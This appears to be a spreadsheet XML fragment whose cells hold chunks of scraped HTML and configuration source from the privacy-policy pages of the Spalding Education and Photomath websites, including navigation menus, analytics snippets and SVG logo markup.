7d9648e9e54e62521dd1f-min.en-US.js"}},"pageType":2,"website":{"id":"5b9b363c372b9691eba6582a","identifier":"brass-fennel-tzpt","websiteType":4,"contentModifiedOn":1678468134590,"cloneable":false,"hasBeenCloneable":false,"developerMode":false,"siteStatus":{},"language":"en-US","timeZone":"America/New_York","machineTimeZoneOffset":-14400000,"timeZoneOffset":-14400000,"timeZoneAbbr":"EDT","siteTitle":"Spalding Education","fullSiteTitle":"Privacy Policy \u2014 Spalding Education","siteDescription":"","shareButtonOptions":{"3":true,"7":true,"1":true,"8":true,"4":true,"6":true,"2":true},"authenticUrl":"https://www.spaldingeducation.org","internalUrl":"https://brass-fennel-tzpt.squarespace.com","baseUrl":"https://www.spaldingeducation.org","primaryDomain":"www.spaldingeducation.org","sslSetting":3,"isHstsEnabled":false,"socialAccounts":[{"serviceId":60,"userId":"846833718982034","screenname":"Spalding Method","addedOn":1548797029545,"profileUrl":"https://www.facebook.com/SpaldingMethod/","iconUrl":"http://graph.facebook.com/846833718982034/picture?type=square","metaData":{"service":"facebook"},"iconEnabled":true,"serviceName":"facebook-unauth"},{"serviceId":4,"userId":"408627360","userName":"SpaldingMethod","screenname":"The Spalding Method","addedOn":1548797211191,"profileUrl":"https://twitter.com/SpaldingMethod","iconUrl":"http://pbs.twimg.com/profile_images/378800000232448383/9d3d112d77f9fc06591a89b0dc8fe14b_normal.jpeg","collectionId":"5c50c51b8ab722b06d0110ab","iconEnabled":true,"serviceName":"twitter"},{"serviceId":11,"userId":"UC07ugAXQUVbHcHaN9Lmi-dA","screenname":"The Spalding Method","addedOn":1548866355621,"profileUrl":"https://www.youtube.com/channel/UC07ugAXQUVbHcHaN9Lmi-dA","iconUrl":"https://yt3.ggpht.com/a-/AAuE7mBaOYCcDVhaKlzgJeIAZdikoNs1ijhVQxa09g=s88-mo-c-c0xffffffff-rj-k-no","iconEnabled":true,"serviceName":"youtube"},{"serviceId":10,"userId":"10665917477","userName":"spaldingeducation","screenname":"Spalding Education","addedOn":1548866371966,"profileUrl":"http://instagram.com/spaldingeducation","iconUrl":"https://scontent.cdninstagram.com/vp/85f67a75d610f1430394ab507e8fd608/5CFA2E63/t51.2885-19/s150x150/50312533_321636552036050_6700471254631055360_n.jpg?_nc_ht=scontent.cdninstagram.com","collectionId":"5c51d3433e2d09db725a2744","iconEnabled":true,"serviceName":"instagram"}],"typekitId":"","statsMigrated":false,"imageMetadataProcessingEnabled":false,"screenshotId":"c38323beaeb5d5be205000d7df500236ad56fbb4a7ad97dda920f82d00c7ee35","captchaSettings":{"enabledForDonations":false},"showOwnerLogin":false},"websiteSettings":{"id":"5b9b363c372b9691eba6582d","websiteId":"5b9b363c372b9691eba6582a","subjects":[],"country":"US","state":"VA","simpleLikingEnabled":true,"mobileInfoBarSettings":{"isContactEmailEnabled":false,"isContactPhoneNumberEnabled":false,"isLocationEnabled":false,"isBusinessHoursEnabled":false},"announcementBarSettings":{"style":1,"text":"&lt;p&gt;School Administrators!</t>
  </si>
  <si>
    <t>Now is the time to register your teachers for this year\u2019s courses! Click the banner to find out more!&lt;/p&gt;","clickthroughUrl":{"url":"/pd-courses","newWindow":false}},"popupOverlaySettings":{"showOnScroll":false,"scrollPercentage":25,"showOnTimer":true,"timerDelay":30000,"showUntilSignup":true,"displayFrequency":14,"enableMobile":true,"enabledPages":[],"showOnAllPages":true,"version":1},"commentLikesAllowed":true,"commentAnonAllowed":true,"commentThreaded":true,"commentApprovalRequired":false,"commentAvatarsOn":true,"commentSortType":2,"commentFlagThreshold":0,"commentFlagsAllowed":true,"commentEnableByDefault":true,"commentDisableAfterDaysDefault":0,"disqusShortname":"","commentsEnabled":false,"storeSettings":{"returnPolicy":null,"termsOfService":null,"privacyPolicy":null,"expressCheckout":false,"continueShoppingLinkUrl":"/","useLightCart":false,"showNoteField":false,"shippingCountryDefaultValue":"US","billToShippingDefaultValue":false,"showShippingPhoneNumber":true,"isShippingPhoneRequired":false,"showBillingPhoneNumber":true,"isBillingPhoneRequired":false,"currenciesSupported":["CHF","HKD","MXN","EUR","DKK","USD","CAD","MYR","NOK","THB","AUD","SGD","ILS","PLN","GBP","CZK","SEK","NZD","PHP","RUB"],"defaultCurrency":"USD","selectedCurrency":"USD","measurementStandard":1,"showCustomCheckoutForm":false,"checkoutPageMarketingOptInEnabled":false,"enableMailingListOptInByDefault":false,"sameAsRetailLocation":false,"merchandisingSettings":{"scarcityEnabledOnProductItems":false,"scarcityEnabledOnProductBlocks":false,"scarcityMessageType":"DEFAULT_SCARCITY_MESSAGE","scarcityThreshold":10,"multipleQuantityAllowedForServices":true,"restockNotificationsEnabled":false,"restockNotificationsMailingListSignUpEnabled":false,"relatedProductsEnabled":false,"relatedProductsOrdering":"random","soldOutVariantsDropdownDisabled":false,"productComposerOptedIn":false,"productComposerABTestOptedOut":false,"productReviewsEnabled":false,"displayImportedProductReviewsEnabled":false,"hasOptedToCollectNativeReviews":false},"isLive":false,"multipleQuantityAllowedForServices":true},"useEscapeKeyToLogin":true,"ssBadgeType":1,"ssBadgePosition":4,"ssBadgeVisibility":1,"ssBadgeDevices":1,"pinterestOverlayOptions":{"mode":"disabled"},"ampEnabled":false},"cookieSettings":{"isCookieBannerEnabled":false,"isRestrictiveCookiePolicyEnabled":false,"isRestrictiveCookiePolicyAbsolute":false,"cookieBannerText":"","cookieBannerTheme":"","cookieBannerVariant":"","cookieBannerPosition":"","cookieBannerCtaVariant":"","cookieBannerCtaText":"","cookieBannerAcceptType":"OPT_IN","cookieBannerOptOutCtaText":""},"websiteCloneable":false,"collection":{"title":"Privacy Policy","id":"5cd08d15eb39311b68bf3242","fullUrl":"/privacy-policy","type":10,"permissionType":1},"subscribed":false,"appDomain":"squarespace.com","templateTweakable":true,"tweakJSON":{"aspect-ratio":"Auto","banner-slideshow-controls":"Arrows","gallery-arrow-style":"No Background","gallery-aspect-ratio":"3:2 Standard","gallery-auto-crop":"true","gallery-autoplay":"false","gallery-design":"Grid","gallery-info-overlay":"Show on Hover","gallery-loop":"false","gallery-navigation":"Bullets","gallery-show-arrows":"true","gallery-transitions":"Fade","galleryArrowBackground":"rgba(34,34,34,1)","galleryArrowColor":"rgba(255,255,255,1)","galleryAutoplaySpeed":"3","galleryCircleColor":"rgba(255,255,255,1)","galleryInfoBackground":"rgba(0, 0, 0, .7)","galleryThumbnailSize":"100px","gridSize":"280px","gridSpacing":"10px","logoContainerWidth":"210px","product-gallery-auto-crop":"false","product-image-auto-crop":"true","siteTitleContainerWidth":"220px","tweak-v1-related-products-title-spacing":"50px"},"templateId":"52a74dafe4b073a80cd253c5","templateVersion":"7","pageFeatures":[1,2,4],"gmRenderKey":"QUl6YVN5Q0JUUk9xNkx1dkZfSUUxcjQ2LVQ0QWVUU1YtMGQ3bXk4","templateScriptsRootUrl":"https://static1.squarespace.com/static/ta/52a74d9ae4b0253945d2aee9/1043/scripts/","betaFeatureFlags":["is_feature_gate_refresh_enabled","scripts_defer","campaigns_new_image_layout_picker","crm_waitlist_enforce_recaptcha_v3_enterprise","block_annotations_revamp","campaigns_discount_section_in_automations","campaigns_content_editing_survey","marketing_landing_page","crm_default_newsletter_block_to_campaigns","commerce_site_visitor_metrics","commerce_clearpay","campaigns_show_featured_templates","campaigns_import_discounts","campaigns_discount_section_in_blasts","crm_enforce_recaptcha_v3_enterprise","order_status_page_checkout_landing_enabled","crm_retention_segment","accounting_orders_sync","campaigns_global_uc_ab","multilingual_transactional_emails","fluid_engine_clean_up_grid_contextual_change","viewer-role-contributor-invites","nested_categories_migration_enabled","fluid_engine","customer_account_creation_recaptcha","campaigns_asset_picker","campaigns_new_subscriber_search","member_areas_spanish_interviews","commerce_order_status_access","site_user_email_change","commerce_restock_notifications","commerce_etsy_shipping_import","commerce_etsy_product_import","member_areas_provisioning_service","campaigns_thumbnail_layout","member_areas_schedule_interview","crm_remove_subscriber","crm_enable_recaptcha_v3_enterprise","background_art_onboarding","send_local_pickup_ready_email","customer_accounts_email_verification"],"videoAssetsFeatureFlags":["mux-data-video-collection","mux-data-course-collection"],"impersonatedSession":false,"tzData":{"zones":[[-300,"US","E%sT",null]],"rules":{"US":[[1967,2006,null,"Oct","lastSun","2:00","0","S"],[1987,2006,null,"Apr","Sun&gt;=1","2:00","1:00","D"],[2007,"max",null,"Mar","Sun&gt;=8","2:00","1:00","D"],[2007,"max",null,"Nov","Sun&gt;=1","2:00","0","S"]]}},"showAnnouncementBar":false,"recaptchaEnterpriseContext":{"recaptchaEnterpriseSiteKey":"6LdDFQwjAAAAAPigEvvPgEVbb7QBm-TkVJdDTlAv"},"i18nContext":{"timeZoneData":{"id":"America/New_York","name":"Eastern Time"}}};&lt;/script&gt;&lt;script&gt;SquarespaceFonts.loadViaContext(); Squarespace.load(window);&lt;/script&gt;
&lt;script type="application/ld+json"&gt;{"url":"https://www.spaldingeducation.org","name":"Spalding Education","description":"","@context":"http://schema.org","@type":"WebSite"}&lt;/script&gt;&lt;link rel="stylesheet" type="text/css" href="https://static1.squarespace.com/static/sitecss/5b9b363c372b9691eba6582a/54/52a74dafe4b073a80cd253c5/5b9b363d372b9691eba6583f/1043/site.css"/&gt;&lt;script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"&gt;&lt;/script&gt;&lt;script&gt;Static. COOKIE_BANNER_CAPABLE = true;&lt;/script&gt;
&lt;!-- End of Squarespace Headers --&gt;
    &lt;script&gt;/* Must be below squarespace-headers */(function(){var e='ontouchstart'in</t>
  </si>
  <si>
    <t xml:space="preserve">window||navigator.msMaxTouchPoints;var t=document.documentElement;if(!e&amp;&amp;t){t.className=t.className.replace(/touch-styles/,'')}})()
     &lt;/script&gt;
  &lt;/head&gt;
  &lt;body id="collection-5cd08d15eb39311b68bf3242" class="enable-nav-button nav-button-style-outline nav-button-corner-style-pill banner-button-style-solid banner-button-corner-style-pill banner-slideshow-controls-arrows meta-priority-date  hide-entry-author hide-list-entry-footer    hide-blog-sidebar center-navigation--info    event-show-past-events event-thumbnails event-thumbnail-size-32-standard event-date-label  event-list-show-cats event-list-date event-list-time event-list-address   event-icalgcal-links  event-excerpts      gallery-design-grid aspect-ratio-auto lightbox-style-light gallery-navigation-bullets gallery-info-overlay-show-on-hover gallery-aspect-ratio-32-standard gallery-arrow-style-no-background gallery-transitions-fade gallery-show-arrows gallery-auto-crop   product-list-titles-under product-list-alignment-center product-item-size-11-square product-image-auto-crop product-gallery-size-11-square  show-product-price show-product-item-nav product-social-sharing tweak-v1-related-products-image-aspect-ratio-11-square tweak-v1-related-products-details-alignment-center newsletter-style-dark hide-opentable-icons opentable-style-dark small-button-style-solid small-button-shape-rounded medium-button-style-solid medium-button-shape-pill large-button-style-solid large-button-shape-square image-block-poster-text-alignment-center image-block-card-dynamic-font-sizing image-block-card-content-position-center image-block-card-text-alignment-center image-block-overlap-dynamic-font-sizing image-block-overlap-content-position-center image-block-overlap-text-alignment-left image-block-collage-dynamic-font-sizing image-block-collage-content-position-top image-block-collage-text-alignment-left image-block-stack-dynamic-font-sizing image-block-stack-text-alignment-left button-style-solid button-corner-style-pill tweak-product-quick-view-button-style-floating tweak-product-quick-view-button-position-bottom tweak-product-quick-view-lightbox-excerpt-display-truncate tweak-product-quick-view-lightbox-show-arrows tweak-product-quick-view-lightbox-show-close-button tweak-product-quick-view-lightbox-controls-weight-light native-currency-code-usd collection-5cd08d15eb39311b68bf3242 collection-type-page collection-layout-default mobile-style-available "&gt;
    &lt;a href="#" class="body-overlay"&gt;&lt;/a&gt;
    &lt;div class="sqs-announcement-bar-dropzone"&gt;&lt;/div&gt;
    &lt;div id="sidecarNav"&gt;
  &lt;div id="mobileNavWrapper" class="nav-wrapper" data-content-field="navigation-mobileNav"&gt;
    &lt;nav id="mobileNavigation"&gt;
          &lt;div class="folder"&gt;
            &lt;div class="folder-toggle" data-href="/about"&gt;About&lt;/div&gt;
            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/the-spalding-method"&gt;
                  THE SPALDING METHOD
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/the-writing-road-to-reading-program"&gt;
                  The Writing Road to Reading Program
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/research-and-evidence"&gt;
                  Research and Evidence
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/ssl"&gt;
                  Spalding Spelling Lesson Videos 
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/accredited-schools"&gt;
                  Accredited Schools
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/certification"&gt;
                  Certification
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/contact"&gt;
                  Contact Us
                &lt;/a&gt;
              </t>
  </si>
  <si>
    <t>&lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/spalding-board-and-staff"&gt;
                  Spalding Board and Staff
                &lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="folder"&gt;
            &lt;div class="folder-toggle" data-href="/training"&gt;Training&lt;/div&gt;
            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/courses"&gt;
                  Courses 
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/professional-development-1"&gt;
                  Professional Development
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://online.spaldingeducation.org/login/" target="_blank"&gt;
                  Course Login
                &lt;/a&gt;
               &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="folder"&gt;
            &lt;div class="folder-toggle" data-href="/resources"&gt;Resources&lt;/div&gt;
            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/src"&gt;
                  Spalding Resource Center 
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/freeresources"&gt;
                  Free Resources 
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/standards-and-correlations"&gt;
                  Standards and Correlations
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/spalding-app"&gt;
                  Spalding App
                &lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="folder"&gt;
            &lt;div class="folder-toggle" data-href="/store"&gt;Store&lt;/div&gt;
            &lt;div class="subnav"&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/shop-products"&gt;
                  Shop our Products 
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="collection"&gt;
                &lt;a href="/payment-and-shipping-options"&gt;
                  Payment and Shipping Options
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/instructional-and-resource-materials"&gt;
                  Phonogram Cards
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/supplies"&gt;
                  Notebooks and Supplies 
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/instructional-and-resource-materials"&gt;
                  Instructional and Resource Materials
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/leveled-readers-1"&gt;
                  Leveled Readers and Fluency
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/teachers-guides"&gt;
                  Teacher's Guides
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/new-products"&gt;
                  New Products
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/home-educators"&gt;
                  Home Education Student Materials
                &lt;/a&gt;
               &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/student-learning-and-practice-materials"&gt;
                  Student Learning and Practice Materials
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/posters"&gt;
                  Posters
                &lt;/a&gt;
              &lt;/div&gt;
              &lt;div class="external"&gt;
                &lt;a href="https://spaldingeducationstore.org/collections/clearance"&gt;
                  Clearance
                &lt;/a&gt;
              &lt;/div&gt;
            &lt;/div&gt;
          &lt;/div&gt;
            &lt;div class="collection"&gt;
              &lt;a href="/faq"&gt;
                FAQ
              &lt;/a&gt;
            &lt;/div&gt;
    &lt;/nav&gt;
  &lt;/div&gt;
    &lt;/div&gt;
    &lt;div id="siteWrapper" class="clearfix"&gt;
      &lt;div class="sqs-cart-dropzone"&gt;&lt;/div&gt;
      &lt;header id="header" class="show-on-scroll" data-offset-el=".index-section" data-offset-behavior="bottom" role="banner"&gt;
        &lt;div class="header-inner"&gt;
          &lt;div id="siteTitleWrapper" class="wrapper" data-content-field="site-title"&gt;
              &lt;h1 id="siteTitle" class="site-title"&gt;&lt;a href="/"&gt;Spalding Education&lt;/a&gt;&lt;/h1&gt;
          &lt;/div&gt;&lt;!--
          --&gt;&lt;div class="mobile-nav-toggle"&gt;&lt;div class="top-bar"&gt;&lt;/div&gt;&lt;div class="middle-bar"&gt;&lt;/div&gt;&lt;div class="bottom-bar"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="mobile-nav-toggle fixed-nav-toggle"&gt;&lt;div class="top-bar"&gt;&lt;/div&gt;&lt;div class="middle-bar"&gt;&lt;/div&gt;&lt;div class="bottom-bar"&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--
          --&gt;&lt;div id="headerNav"&gt;
  &lt;div id="mainNavWrapper" class="nav-wrapper" data-content-field="navigation-mainNav"&gt;
    &lt;nav id="mainNavigation" data-content-field="navigation-mainNav"&gt;
          &lt;di</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;!-- Google Tag Manager --&gt;_x005F_x000D_
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':_x005F_x000D_
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],_x005F_x000D_
</t>
  </si>
  <si>
    <t>j =d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=_x005F_x000D_
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);_x005F_x000D_
})(window,document,'script','dataLayer','GTM-5WMW49X');&lt;/script&gt;_x005F_x000D_
&lt;!-- End Google Tag Manager --&gt;    &lt;meta charset="UTF-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/&gt;
    &lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
    &lt;link rel="pingback" href="https://34.136.64.150/xmlrpc.php"&gt;
    &lt;title&gt;
		Privacy Policy - Photomath    &lt;/title&gt;
	    &lt;link rel="apple-touch-icon" sizes="180x180"
          href="https://photomath.com/wp-content/themes/photomath-web-2021/static/ui/favicon/apple-touch-icon.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="32x32"
          href="https://photomath.com/wp-content/themes/photomath-web-2021/static/ui/favicon/favicon-32x32.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="16x16"
          href="https://photomath.com/wp-content/themes/photomath-web-2021/static/ui/favicon/favicon-16x16.png"&gt;
    &lt;link rel="manifest" href="https://photomath.com/wp-content/themes/photomath-web-2021/static/ui/favicon/site.webmanifest"&gt;
    &lt;link rel="mask-icon" href="https://photomath.com/wp-content/themes/photomath-web-2021/static/ui/favicon/safari-pinned-tab.svg"
          color="#bf0c34"&gt;
    &lt;meta name="msapplication-TileColor" content="#bf0c34"&gt;
    &lt;meta name="theme-color" content="#ffffff"&gt;
    &lt;meta name="apple-itunes-app" content="app-id=919087726"&gt;
    &lt;link rel="shortcut icon" href="https://photomath.com/wp-content/themes/photomath-web-2021/static/ui/favicon/favicon.ico"
          type="image/x-icon"&gt;
    &lt;script src="https://photomath.com/wp-content/themes/photomath-web-2021/static/js/vendor/cookiePanel.js"&gt;&lt;/script&gt;
	        &lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-56130223-3"&gt;&lt;/script&gt;
        &lt;script&gt;
            window.dataLayer</t>
  </si>
  <si>
    <t>We encourage you to fully review the updated Privacy Policy, but here are some of [&amp;hellip;]" /&gt;
	&lt;meta property="og:url" content="https://photomath.com/en/privacypolicy" /&gt;
	&lt;meta property="og:site_name" content="Photomath" /&gt;
	&lt;meta property="article:modified_time" content="2022-09-14T15:42:06+00:00" /&gt;
	&lt;meta property="og:image" content="https://photomath.com/wp-content/uploads/2021/09/Share-image.jpg" /&gt;
	&lt;meta property="og:image:width" content="2400" /&gt;
	&lt;meta property="og:image:height" content="1260" /&gt;
	&lt;meta property="og:image:type" content="image/jpeg" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="30 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"https://photomath.com/en/privacypolicy","url":"https://photomath.com/en/privacypolicy","name":"Privacy Policy - Photomath","isPartOf":{"@id":"https://photomath.com/en#website"},"datePublished":"2022-02-14T09:53:44+00:00","dateModified":"2022-09-14T15:42:06+00:00","breadcrumb":{"@id":"https://photomath.com/en/privacypolicy#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://photomath.com/en/privacypolicy"]}]},{"@type":"BreadcrumbList","@id":"https://photomath.com/en/privacypolicy#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://photomath.com/en"},{"@type":"ListItem","position":2,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"https://photomath.com/en#website","url":"https://photomath.com/en","name":"Photomath","description":"Math explained, step-by-step","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://photomath.com/en?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"}]}&lt;/script&gt;
	&lt;!-- / Yoast SEO plugin.</t>
  </si>
  <si>
    <t>--&gt;
&lt;link rel='stylesheet' id='photomathWeb2021MainCSS-css' href='/wp-content/themes/photomath-web-2021/static/dist/style.css' type='text/css' media='' /&gt;
&lt;link rel='stylesheet' id='classic-theme-styles-css' href='/wp-includes/css/classic-themes.min.css'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t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='wpml-blocks-css' href='/wp-content/plugins/sitepress-multilingual-cms/dist/css/blocks/styles.css' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='bodhi-svgs-attachment-css' href='/wp-content/plugins/svg-support/css/svgs-attachment.css' type='text/css' media='all' /&gt;
&lt;link rel="https://api.w.org/" href="https://photomath.com/en/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="https://photomath.com/en/wp-json/wp/v2/pages/2278" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://34.136.64.150/wp-includes/wlwmanifest.xml" /&gt;
&lt;link rel='shortlink' href='https://photomath.com/en?p=2278' /&gt;
&lt;meta name="generator" content="WPML ver:4.6.3 stt:1,4,3,27,66,45,2,53;" /&gt;
&lt;/head&gt;
&lt;body class="page-template-default page page-id-2278"&gt;
&lt;!-- Google Tag Manager (noscript) --&gt;_x005F_x000D_
&lt;noscript&gt;&lt;iframe src=“https://www.googletagmanager.com/ns.html?id=GTM-5WMW49X”_x005F_x000D_
height=“0" width=“0” style=“display:none;visibility:hidden”&gt;&lt;/iframe&gt;&lt;/noscript&gt;_x005F_x000D_
&lt;!-- End Google Tag Manager (noscript) --&gt;&lt;main&gt;
&lt;nav class="o-navigation js-navigation"&gt;
    &lt;div class="c-navigation c-navigation--white hover-color-pink"&gt;
        &lt;div class="c-navigation__logo"&gt;
            &lt;a href="https://photomath.com/en"&gt;
				&lt;svg class="u-icon u-icon--logo" viewBox="0 0 191 40" fill="none" xmlns="http://www.w3.org/2000/svg"&gt;
  &lt;path d="M36.2306 40H3.74797C1.67805 40 0 38.321 0 36.2501V3.74992C0 1.67902 1.67805 0 3.74797 0H36.2306C38.3005 0 39.9785 1.67902 39.9785 3.74992V36.2501C39.9785 38.321 38.3005 40 36.2306 40Z" fill="#BF0C34"/&gt;
  &lt;path d="M25.0261 13.7267L21.2781 19.9765L25.0261 26.2266H22.5276L20.0287 22.0601L17.5302 26.2266H15.0316L18.7796 19.9765L15.0316 13.7267H17.5302L20.0287 17.8932L22.5276</t>
  </si>
  <si>
    <t>13.7267H25.0261ZM27.525 31.2266H12.5328V8.72673H27.525V13.7267H30.0235V7.51567C30.0235 6.80477 29.4456 6.22656 28.7351 6.22656H11.3227C10.6121 6.22656 10.0342 6.80477 10.0342 7.51567V32.4376C10.0342 33.1482 10.6121 33.7267 11.3227 33.7267H28.7351C29.4456 33.7267 30.0235 33.1482 30.0235 32.4376V26.2266H27.525V31.2266ZM27.525 23.7264H33.7715V21.2266H27.525V23.7264ZM27.525 16.2266V18.7264H33.7715V16.2266H27.525Z" fill="white"/&gt;
  &lt;path class="u-icon__logo-text" d="M86.1104 19.9598C86.1104 18.9367 86.2869 18.0066 86.6401 17.1695C86.9933 16.3325 87.4769 15.6118 88.0902 15.0069C88.7038 14.4027 89.4382 13.9328 90.2934 13.5981C91.1484 13.2632 92.0782 13.0957 93.0821 13.0957C94.086 13.0957 95.0154 13.2632 95.8707 13.5981C96.7256 13.9328 97.4603 14.4027 98.0736 15.0069C98.6873 15.6118 99.1705 16.3325 99.524 17.1695C99.8768 18.0066 100.054 18.9367 100.054 19.9598C100.054 20.9829 99.8768 21.9126 99.524 22.7497C99.1705 23.5868 98.6873 24.3081 98.0736 24.9123C97.4603 25.5168 96.7256 25.9864 95.8707 26.3211C95.0154 26.656 94.086 26.8232 93.0821 26.8232C92.0782 26.8232 91.1484 26.656 90.2934 26.3211C89.4382 25.9864 88.7038 25.5168 88.0902 24.9123C87.4769 24.3081 86.9933 23.5868 86.6401 22.7497C86.2869 21.9126 86.1104 20.9829 86.1104 19.9598ZM88.4528 19.9598C88.4528 20.6479 88.5598 21.285 88.7734 21.871C88.9871 22.4567 89.2986 22.9685 89.7077 23.4053C90.1165 23.8427 90.6047 24.1868 91.1718 24.4378C91.7386 24.6889 92.3754 24.8144 93.0821 24.8144C93.7884 24.8144 94.4248 24.6889 94.9923 24.4378C95.5591 24.1868 96.0473 23.8427 96.4564 23.4053C96.8651 22.9685 97.1767 22.4567 97.3903 21.871C97.604 21.285 97.7113 20.6479 97.7113 19.9598C97.7113 19.2716 97.604 18.6342 97.3903 18.0482C97.1767 17.4625 96.8651 16.951 96.4564 16.5139C96.0473 16.0768 95.5591 15.7325 94.9923 15.4814C94.4248 15.2303 93.7884 15.1048 93.0821 15.1048C92.3754 15.1048 91.7386 15.2303 91.1718 15.4814C90.6047 15.7325 90.1165 16.0768 89.7077 16.5139C89.2986 16.951 88.9871 17.4625 88.7734 18.0482C88.5598 18.6342 88.4528 19.2716 88.4528 19.9598Z"/&gt;
  &lt;path class="u-icon__logo-text" d="M110.586 15.3064H106.737V21.8352C106.737 22.2632 106.746 22.6583 106.765 23.0209C106.783 23.3838 106.858 23.7002 106.988 23.9698C107.118 24.2394 107.313 24.4534 107.574 24.6115C107.834 24.7695 108.205 24.8485 108.689 24.8485C109.005 24.8485 109.331 24.8115 109.665 24.737C110 24.6629 110.316 24.5513 110.614 24.402L110.697 26.3832C110.325 26.5507 109.911 26.6713 109.456 26.7458C109 26.8202 108.568 26.8573 108.159 26.8573C107.379 26.8573 106.756 26.7552 106.291 26.5507C105.826 26.3461 105.464 26.058 105.203 25.6856C104.943 25.3136 104.771 24.8534 104.687 24.3045C104.604 23.7559 104.562 23.1464 104.562 22.4772V15.3064H101.718V13.4648H104.562V9.75391H106.737V13.4648H110.586V15.3064Z"/&gt;
  &lt;path class="u-icon__logo-text" d="M112.495 19.9598C112.495 18.9367 112.671 18.0066 113.024 17.1695C113.378 16.3325 113.861 15.6118 114.475 15.0069C115.088 14.4027 115.822 13.9328 116.678 13.5981C117.533 13.2632 118.462 13.0957 119.466 13.0957C120.47 13.0957 121.4 13.2632 122.255 13.5981C123.11 13.9328 123.845 14.4027 124.458 15.0069C125.072 15.6118 125.555 16.3325 125.908 17.1695C126.261 18.0066 126.438 18.9367 126.438 19.9598C126.438 20.9829 126.261 21.9126 125.908</t>
  </si>
  <si>
